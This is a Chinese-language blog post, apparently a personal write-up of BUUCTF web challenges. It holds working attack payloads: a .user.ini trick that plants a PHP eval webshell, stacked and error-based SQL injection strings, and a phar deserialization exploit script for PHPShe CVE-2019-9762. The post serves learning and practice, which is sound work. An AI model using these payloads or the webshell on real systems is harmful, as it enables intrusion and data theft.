
 <!DOCTYPE HTML>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>BUUCTF | buxqm</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=3, minimum-scale=1">
    
    <meta name="author" content="Ycj">
    
    <meta name="description" content="checkin​    是一道文件上传题，首先抓包分析一波，发现&amp;lt;?,php,等都不行，直接上传基本凉凉，于是考虑解析漏洞。
​    发现题目服务端是nginx，htaccess也不行，在网上看到了一个姿势，user.ini构建后门 在这里记录一下用这个姿势的条件
​    1.上传目录下要">
    
    
    
    
    
    <link rel="icon" href="/img/favicon.ico">
    
    
    <link rel="apple-touch-icon" href="/img/author.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/author.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      <div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo.svg" alt="buxqm" title="buxqm"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="buxqm">buxqm</a></h1>
				<h2 class="blog-motto"></h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
					<li>
					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="text" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:yoursite.com">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>

    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2019/09/10/BUUCTF/" title="BUUCTF" itemprop="url">BUUCTF</a>
  </h1>
  <p class="article-author">By
    
      <a href="http://yoursite.com" title="Ycj">Ycj</a>
    </p>
  <p class="article-time">
    <time datetime="2019-09-09T16:00:00.000Z" itemprop="datePublished">2019-09-10</time>
    Updated:<time datetime="2020-06-30T05:15:15.472Z" itemprop="dateModified">2020-06-30</time>
    
  </p>
</header>
	<div class="article-content">
		
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">Contents</strong>
		<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#checkin"><span class="toc-number">1.</span> <span class="toc-text">checkin</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-tornado"><span class="toc-number">1.1.</span> <span class="toc-text">easy_tornado</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#随便注"><span class="toc-number">1.2.</span> <span class="toc-text">随便注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easysql"><span class="toc-number">1.3.</span> <span class="toc-text">easysql</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRFME"><span class="toc-number">1.4.</span> <span class="toc-text">SSRFME</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fakebook"><span class="toc-number">1.5.</span> <span class="toc-text">fakebook</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RCTF2015-EasySQL"><span class="toc-number">1.6.</span> <span class="toc-text">[RCTF2015]EasySQL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RoarCTF-2019-PHPShe"><span class="toc-number">1.7.</span> <span class="toc-text">[RoarCTF 2019]PHPShe</span></a></li></ol></li></ol>
		</div>
		
		<h1 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h1><p>​    是一道文件上传题，首先抓包分析一波，发现&lt;?,php,等都不行，直接上传基本凉凉，于是考虑解析漏洞。</p>
<p>​    发现题目服务端是nginx，htaccess也不行，在网上看到了一个姿势，<a href="https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html" target="_blank" rel="noopener">user.ini构建后门</a> 在这里记录一下用这个姿势的条件</p>
<p>​    1.上传目录下要有可执行的php文件。</p>
<p>​    2.服务器使用CGI/FastCGI模式</p>
<p>​    3.php版本要在5.3.0后</p>
<p>​    创建user.ini写入</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a  </span><br><span class="line"><span class="attr">auto_prepend_file</span>=test.jpg</span><br></pre></td></tr></table></figure>

<p>​    于是上传一句话木马,名为test.jpg</p>
<p><code>&lt;script language=&#39;php&#39;&gt;@eval($_POST[&#39;aa&#39;]);&lt;/script&gt;</code></p>
<p>​    这样我们的文件就会被包含到同目录中的那个index.php中了，接下来的操作就不说了。</p>
<h2 id="easy-tornado"><a href="#easy-tornado" class="headerlink" title="easy_tornado"></a>easy_tornado</h2><p>​    这道题算是我做过的第一道ssti题目，首先发现提示中的render可以知道该题使用tornado模板写的，参考writeup，发现tornado的配置可以放在handler.settings中于是得到payload: <code></code>得到secret_cookie。</p>
<h2 id="随便注"><a href="#随便注" class="headerlink" title="随便注"></a>随便注</h2><p>​    随便注了一下发现基本都被过滤了T_T!<img src="https://i.loli.net/2019/10/10/nqau2sQf315WjHx.png" alt></p>
<p>​    看了网上的wp，发现这是一道堆叠注入。emmm，这里就不再赘述了，记录一下网上的各种payload</p>
<p> 方法1：存储过程绕过</p>
<p>​    1.把关键字编程哈希值绕过                                      </p>
<p> payload:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1%27;<span class="keyword">SeT</span>@a=<span class="number">0x73656c656374202a2066726f6d20603139313938313039333131313435313460</span>;<span class="keyword">prepare</span>%<span class="number">20</span>execsql%<span class="number">20</span><span class="keyword">from</span>%<span class="number">20</span>@a;<span class="keyword">execute</span>%<span class="number">20</span>execsql;</span><br></pre></td></tr></table></figure>

<p>​    2.使用concat连接关键字</p>
<p>payload:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">';<span class="keyword">use</span> supersqli;<span class="keyword">set</span> @<span class="keyword">sql</span>=<span class="keyword">concat</span>(<span class="string">'s'</span>,<span class="string">'elect `flag` from `1919810931114514`'</span>);<span class="keyword">PREPARE</span> stmt1 <span class="keyword">FROM</span> @<span class="keyword">sql</span>;<span class="keyword">EXECUTE</span> stmt1;<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>方法2:重命名表名，字段名</p>
<p>payload：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">';<span class="keyword">alter</span> <span class="keyword">table</span> <span class="string">`1919810931114514`</span> <span class="keyword">add</span>(<span class="keyword">id</span> <span class="built_in">int</span> <span class="literal">NULL</span>);<span class="keyword">rename</span> <span class="keyword">table</span> <span class="string">`words`</span> <span class="keyword">to</span> <span class="string">`tmp`</span>;<span class="keyword">rename</span> <span class="keyword">table</span> <span class="string">`1919810931114514`</span> <span class="keyword">to</span> <span class="string">`words`</span>;</span><br></pre></td></tr></table></figure>

<h2 id="easysql"><a href="#easysql" class="headerlink" title="easysql"></a>easysql</h2><p>​    这里涉及MYSQL的一种管道符模式。可以在MYSQL中开启支持管道符来进行字符串的拼接操作。构造payload :</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1;<span class="keyword">set</span> sql_mode=pipes_as_concat;<span class="keyword">select</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>条件：查询语句中有||。</p>
<p>​    还有一种payload</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*,2</span><br></pre></td></tr></table></figure>

<p>​    这种也比较好理解，这样就把查询语句分成了两部分</p>
<h2 id="SSRFME"><a href="#SSRFME" class="headerlink" title="SSRFME"></a>SSRFME</h2><p>​    方法一：字符串拼接</p>
<p>​    源码中生成sign是这样一行代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashlib.md5(secert_key + param + action).hexdigest()</span><br></pre></td></tr></table></figure>

<p>​    你得到sign是这样的</p>
<p><img src="https://i.loli.net/2019/10/11/Ku8v9wAXGfrVhU4.png" alt></p>
<p>​    你只能得到secret_key+param+scan的值。</p>
<p>​    签名检测代码是这样的</p>
<p><img src="https://i.loli.net/2019/10/11/IBPZfykxGv8wgdS.png" alt></p>
<p>​    然后看到exec()里的代码(代码就不帖了)，就可以得到解题方法：用scan来读flag.txt中的值保存到result.txt中，然后用read把它读出来。</p>
<p>​    所以访问/De1ta，payload:param=flag.txt,通过cookie上传action=readscan,sign的值可以通过访问/getSign上传param=flag.txtread来获得。这样两种sign都是secert_key+flag.txt+readscan，完美的拼接成功拿到flag</p>
<p>​    方法二：local_file读取文件</p>
<p>​    先生成已知值：md5(secret_key+local-file:///proc/self/cwd/flag.txt +scan)然后用hashpump生成MD5(secret_key+local-file:///proc/self/cwd/flag.txt +scan+read)的值就行了。</p>
<p>​    ps:local-file:///proc/self/cwd/代表当前目录，local-file一定要绝对地址。</p>
<p>这里推荐一个详细的writeup</p>
<p><a href="https://xz.aliyun.com/t/6050" target="_blank" rel="noopener">SSRFME一题三解</a></p>
<h2 id="fakebook"><a href="#fakebook" class="headerlink" title="fakebook"></a>fakebook</h2><p>​    waf没有过滤load_file，给出了文件地址，直接load_file读取/var/www/flag.php,payload：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1 union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">load_file</span>(<span class="string">'/var/www/flag.php'</span>),<span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>可以在源码中看到flag</p>
<h2 id="RCTF2015-EasySQL"><a href="#RCTF2015-EasySQL" class="headerlink" title="[RCTF2015]EasySQL"></a>[RCTF2015]EasySQL</h2><p>​    打开题目是一个登陆页面，随便注册一个登陆。</p>
<p><img src="https://i.loli.net/2019/11/12/GdEq7NsOHZB5k1V.png" alt></p>
<p>​    在用户界面有一个重置密码，可能是二次注入。返回注册页面试了一试，发现username和email处存在过滤。首先试一下闭合类型，注册<code>&#39;12&quot;\</code>然后登陆，修改密码发现报错。<img src="C:%5CUsers%5CYCJ%5CAppData%5CLocal%5CTemp%5C1573556029448.png" alt="1573556029448"> </p>
<p>那这题应该是一个双引号闭合的报错注入。接下来就是爆表,列。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&quot;||updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x3a),1)#</span><br></pre></td></tr></table></figure>

<p>发现有个flag表，进去之后没有flag，于是搜一下别的表。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&quot;||updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name=&apos;users&apos;)),0x3a),1)#</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2019/11/12/l6AOEGLTBkboI8U.png" alt></p>
<p>发现显示不全，限制一下输出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&quot;||updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name=&apos;users&apos;)&amp;&amp;(column_name)regexp(&apos;^r&apos;)),0x3a),1)#</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2019/11/12/yZRwL21DGMbV5i7.png" alt></p>
<p>得到列名，这里regexp<a href="https://www.cnblogs.com/yizitrd/p/5441988.html" target="_blank" rel="noopener">是正则表达式函数</a>，这里就不再赘述。接下来爆flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&quot;||updatexml(1,concat(0x3a,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp(&apos;^f&apos;)),0x3a),1)#</span><br></pre></td></tr></table></figure>

<p>也是同样显示不全，这里可以用一个reverse函数反向输出一下查到的字符串。然后自己手动拼一下flag就出来了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&quot;||updatexml(1,reverse(concat(0x3a,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp(&apos;^f&apos;)),0x3a)),1)#</span><br></pre></td></tr></table></figure>

<h2 id="RoarCTF-2019-PHPShe"><a href="#RoarCTF-2019-PHPShe" class="headerlink" title="[RoarCTF 2019]PHPShe"></a>[RoarCTF 2019]PHPShe</h2><p>​    一道框架类的题，对于框架类的题目，不是CVE就是出题人修改了源码制造的漏洞,这题都有。</p>
<p>​    <img src="https://i.loli.net/2020/06/29/ZsxDktbeq3vWuCH.png" alt></p>
<p>​    发现是PHPSHE v1.7于是搜了一下有 <a href="https://anquan.baidu.com/article/697" target="_blank" rel="noopener">CVE-2019-9762</a>，分析一下，在common.php中，会对上传的参数的变量名根据上传方式加上前缀。<img src="https://i.loli.net/2020/06/30/F5Q8lX47y9HYsVx.png" alt></p>
<p>​    利用点是/include/plugin/payment/alipay/pay.php，变量order_id是可控的。<img src="https://i.loli.net/2020/06/30/9Sa4ob1cgT8A5RQ.png" alt></p>
<p>​    通过get方式上传id，进入pe_dbhold函数，该函数将参数进行addslashes转义处理，然后传入了order_table函数中，该函数将变量用下划线进行截取。</p>
<p><img src="https://i.loli.net/2020/06/30/QmFKs4gUZD21JoB.png" alt></p>
<p>​    继续跟进pe_select函数。</p>
<p><img src="https://i.loli.net/2020/06/30/zqlkxPcbKTwIN21.png" alt></p>
<p>​    发现order_id作为表名被传入，所以可以控制order_id进行注入。官网包中有phpshe.sql告诉我们数据库配置。</p>
<p><img src="https://i.loli.net/2020/06/30/GCEvUwnzFQ9oBfl.png" alt></p>
<p>​    发现admin表中有6个字段，但是字段名都有下划线，所以必须用无列名注入。</p>
<p>​    payload=pay` where 1=1 union select 1,2,((select`3`from(select 1,2,3,4,5,6 union select * from admin)a limit 1,1)),4,5,6,7,8,9,10,11,12%23_</p>
<p><img src="https://i.loli.net/2020/06/30/25OP1DYu9I7nQNJ.png" alt></p>
<p>解密得到md5密码。<img src="https://i.loli.net/2020/06/30/O7dVfKuqrgBUYcz.png" alt></p>
<p>登陆后台发现一处文件上传点，可以上传jpg,txt,zip文件，并可以得到绝对路径。</p>
<p>​    <img src="https://i.loli.net/2020/06/30/EbpJwPxMe3QuTiy.png" alt></p>
<p>​    将题目源码和官方源码diff之后发现题目源码pclzip.class.php中多了一个__destruct()类，作用是解压压缩包，所以估计是通过phar反序列化触发。</p>
<p><img src="https://i.loli.net/2020/06/30/IAzRSyiOEU58WNk.png" alt></p>
<p>​    于是全局搜索include了pclzip.class.php的类，找到触发点\module\admin\moban.php,    分析一波代码，发现del方法中调用pe_dirdel()方法，跟进发现含有phar触发函数is_file()，而且文件名高度可控，所以思路就出来了，使用phar协议反序列化上传的文件，解压含有shell的压缩包，但是还需要通过pe_token_match()的检验</p>
<p><img src="https://i.loli.net/2020/06/30/vBT56rAsJlGa7we.png" alt></p>
<p>​    这个函数作用是检验token和referer值，我们可以看到token是以post或者get方式上传的，通过审查代码，发现token是放在session中的，所以只要session不变token就不会变，之前上传文件的地方也用了token检验，但是并不需要我们提交token，所以猜测token藏在隐藏表单中，果然找到了。至于Referer只要与和网站host保持一致就好了。</p>
<p><img src="https://i.loli.net/2020/06/30/Zvrm23YJdqWut8j.png" alt></p>
<p>​    </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PclZip</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="comment">// ----- Filename of the zip file</span></span><br><span class="line">    <span class="keyword">var</span> $zipname = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ----- File descriptor of the zip file</span></span><br><span class="line">    <span class="keyword">var</span> $zip_fd = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ----- Internal error handling</span></span><br><span class="line">    <span class="keyword">var</span> $error_code = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">var</span> $error_string = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ----- Current status of the magic_quotes_runtime</span></span><br><span class="line">    <span class="comment">// This value store the php configuration for magic_quotes</span></span><br><span class="line">    <span class="comment">// The class can then disable the magic_quotes and reset it after</span></span><br><span class="line">    <span class="keyword">var</span> $magic_quotes_status;</span><br><span class="line">    <span class="keyword">var</span> $save_path;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// --------------------------------------------------------------------------------</span></span><br><span class="line">    <span class="comment">// Function : PclZip()</span></span><br><span class="line">    <span class="comment">// Description :</span></span><br><span class="line">    <span class="comment">//   Creates a PclZip object and set the name of the associated Zip archive</span></span><br><span class="line">    <span class="comment">//   filename.</span></span><br><span class="line">    <span class="comment">//   Note that no real action is taken, if the archive does not exist it is not</span></span><br><span class="line">    <span class="comment">//   created. Use create() for that.</span></span><br><span class="line">    <span class="comment">// --------------------------------------------------------------------------------</span></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($p_zipname)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">//--(MAGIC-PclTrace)--//PclTraceFctStart(__FILE__, __LINE__, 'PclZip::PclZip', "zipname=$p_zipname");</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// ----- Tests the zlib</span></span><br><span class="line">        </span><br><span class="line"></span><br><span class="line">        <span class="comment">// ----- Set the attributes</span></span><br><span class="line">        <span class="keyword">$this</span>-&gt;zipname = $p_zipname;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;zip_fd = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;magic_quotes_status = <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// ----- Return</span></span><br><span class="line">        <span class="comment">//--(MAGIC-PclTrace)--//PclTraceFctEnd(__FILE__, __LINE__, 1);</span></span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$f=<span class="keyword">new</span> PclZip(<span class="string">"/var/www/html/data/attachment/brand/3.zip"</span>);<span class="comment">//自己上传的zip文件地址</span></span><br><span class="line">$f-&gt;save_path=<span class="string">'/var/www/html/data'</span>;<span class="comment">//解压缩地址，只要不离谱</span></span><br><span class="line">$phar = <span class="keyword">new</span> Phar(<span class="string">"phar.phar"</span>);</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(<span class="string">"&lt;?php __HALT_COMPILER(); ?&gt;"</span>); <span class="comment">//设置stub，增加gif文件头用以欺骗检测</span></span><br><span class="line">$phar-&gt;setMetadata($f); <span class="comment">//将自定义meta-data存入manifest</span></span><br><span class="line">$phar-&gt;addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">//添加要压缩的文件</span></span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>​    将文件名和压缩路径改一改，生成phar文件改名txt，上传，触发，上菜刀，/flag一气呵成。</p>
<p><img src="https://i.loli.net/2020/06/30/KR98yMDgxtCvuIr.png" alt></p>
  
	</div>
		<footer class="article-footer clearfix">


<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/writeup/">writeup</a>
</div>



<div class="article-share" id="share">

  <div data-url="http://yoursite.com/2019/09/10/BUUCTF/" data-title="BUUCTF | buxqm" data-tsina="" class="share clearfix">
  </div>

</div>
</footer>   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2019/09/22/学pwn日记1/" title="pwn日记">
  <strong>PREVIOUS:</strong><br/>
  <span>
  pwn日记</span>
</a>
</div>


<div class="next">
<a href="/2019/08/10/xss-quiz练习记录/"  title="xss练习">
 <strong>NEXT:</strong><br/> 
 <span>xss练习
</span>
</a>
</div>

</nav>

	
<section class="comment">
	<div class="ds-thread"></div>
</section>

</div>  
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">Contents</strong>
  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#checkin"><span class="toc-number">1.</span> <span class="toc-text">checkin</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-tornado"><span class="toc-number">1.1.</span> <span class="toc-text">easy_tornado</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#随便注"><span class="toc-number">1.2.</span> <span class="toc-text">随便注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easysql"><span class="toc-number">1.3.</span> <span class="toc-text">easysql</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRFME"><span class="toc-number">1.4.</span> <span class="toc-text">SSRFME</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fakebook"><span class="toc-number">1.5.</span> <span class="toc-text">fakebook</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RCTF2015-EasySQL"><span class="toc-number">1.6.</span> <span class="toc-text">[RCTF2015]EasySQL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RoarCTF-2019-PHPShe"><span class="toc-number">1.7.</span> <span class="toc-text">[RoarCTF 2019]PHPShe</span></a></li></ol></li></ol>
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">

  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
			<li><a href="/categories/WebBook/" title="WebBook">WebBook<sup>1</sup></a></li>
		
			<li><a href="/categories/docker/" title="docker">docker<sup>1</sup></a></li>
		
			<li><a href="/categories/sql注入/" title="sql注入">sql注入<sup>1</sup></a></li>
		
			<li><a href="/categories/writeup/" title="writeup">writeup<sup>1</sup></a></li>
		
			<li><a href="/categories/xss学习/" title="xss学习">xss学习<sup>1</sup></a></li>
		
		</ul>
</div>


  

  <div class="rsspart">
	<a href="" target="_blank" title="rss">RSS</a>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	<div class="line">
		<span></span>
		<div class="author"></div>
	</div>
	
	
	<section class="info">
		<p> Hello <br/>
			似水流年</p>
	</section>
	 
	<div class="social-font clearfix">
		
		
		
		
		
	</div>
		<p class="copyright">Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/A-limon/pacman" target="_blank" title="Pacman">Pacman</a> © 2020 
		
		<a href="http://yoursite.com" target="_blank" title="Ycj">Ycj</a>
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.1.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else
    {
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      h  = $('article h2')
      ah = $('article h2'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  if(ah.length==0){
    t.css('display','none');
  }else{
    c.click(function(){
      ta.css('display', 'block').addClass('fadeIn');
    });
    o.click(function(){
      ta.css('display', 'none');
    });
    $(window).scroll(function(){
      ta.css("top",Math.max(140,320-$(this).scrollTop()));
    });
  };
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina');
  var html = [
  '<a href="#" class="overlay" id="qrcode"></a>',
  '<div class="qrcode clearfix"><span>扫描二维码分享到微信朋友圈</span><a class="qrclose" href="#share"></a><strong>Loading...Please wait</strong><img id="qrcode-pic" data-src="http://s.jiathis.com/qrcode.php?url=' + encodedUrl + '"/></div>',
  '<a href="#textlogo" class="article-back-to-top" title="Top"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="QRcode"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="Weibo"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);
  $('.article-share-qrcode').click(function(){
    var imgSrc = $('#qrcode-pic').attr('data-src');
    $('#qrcode-pic').attr('src', imgSrc);
    $('#qrcode-pic').load(function(){
        $('.qrcode strong').text(' ');
    });
  });
});     
</script>


<script type="text/javascript">
  var duoshuoQuery = {short_name:""};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0] 
    || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
</script> 





  </body>
</html>
